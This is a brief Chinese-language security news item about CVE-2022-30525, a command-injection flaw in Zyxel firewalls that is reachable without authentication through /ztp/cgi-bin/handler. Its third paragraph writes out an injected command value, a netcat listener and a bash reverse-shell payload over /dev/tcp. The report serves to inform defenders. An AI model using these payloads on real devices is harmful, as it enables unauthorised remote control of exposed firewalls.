Zyxel 防火墙中的漏洞允许在未经身份验证的情况下执行代码

Zyxel 的 ATP、VPN 和 USG FLEX 系列设备中发现了一个严重漏洞 (CVE-2022-30525),该漏洞旨在组织企业中防火墙、IDS 和 VPN 的操作,该漏洞允许外部攻击者在设备没有用户权限,未经身份验证。 要实施攻击,攻击者必须能够使用 HTTP/HTTPS 协议向设备发送请求。 合勤科技已在 ZLD 5.30 固件更新中修复了该漏洞。 据 Shodan 服务称,目前全球网络上有 16213 个潜在易受攻击的设备通过 HTTP/HTTPS 接受请求。

通过向 Web 处理程序 /ztp/cgi-bin/handler 发送专门设计的命令来执行操作,无需身份验证即可访问。 该问题是由于在使用 lib_wan_settings.py 库中使用的 os.system 调用在系统上执行命令并在处理 setWanPortSt 操作时执行的命令时,缺乏正确清理请求参数造成的。

例如,攻击者可以传递字符串“; ping 192.168.1.210;” 这将导致在系统上执行“ping 192.168.1.210”命令。 要访问命令 shell,您可以在系统上运行“nc -lvnp 1270”,然后通过使用“;”向设备发送请求来启动反向连接。 bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'。

来源: opennet.ru

添加评论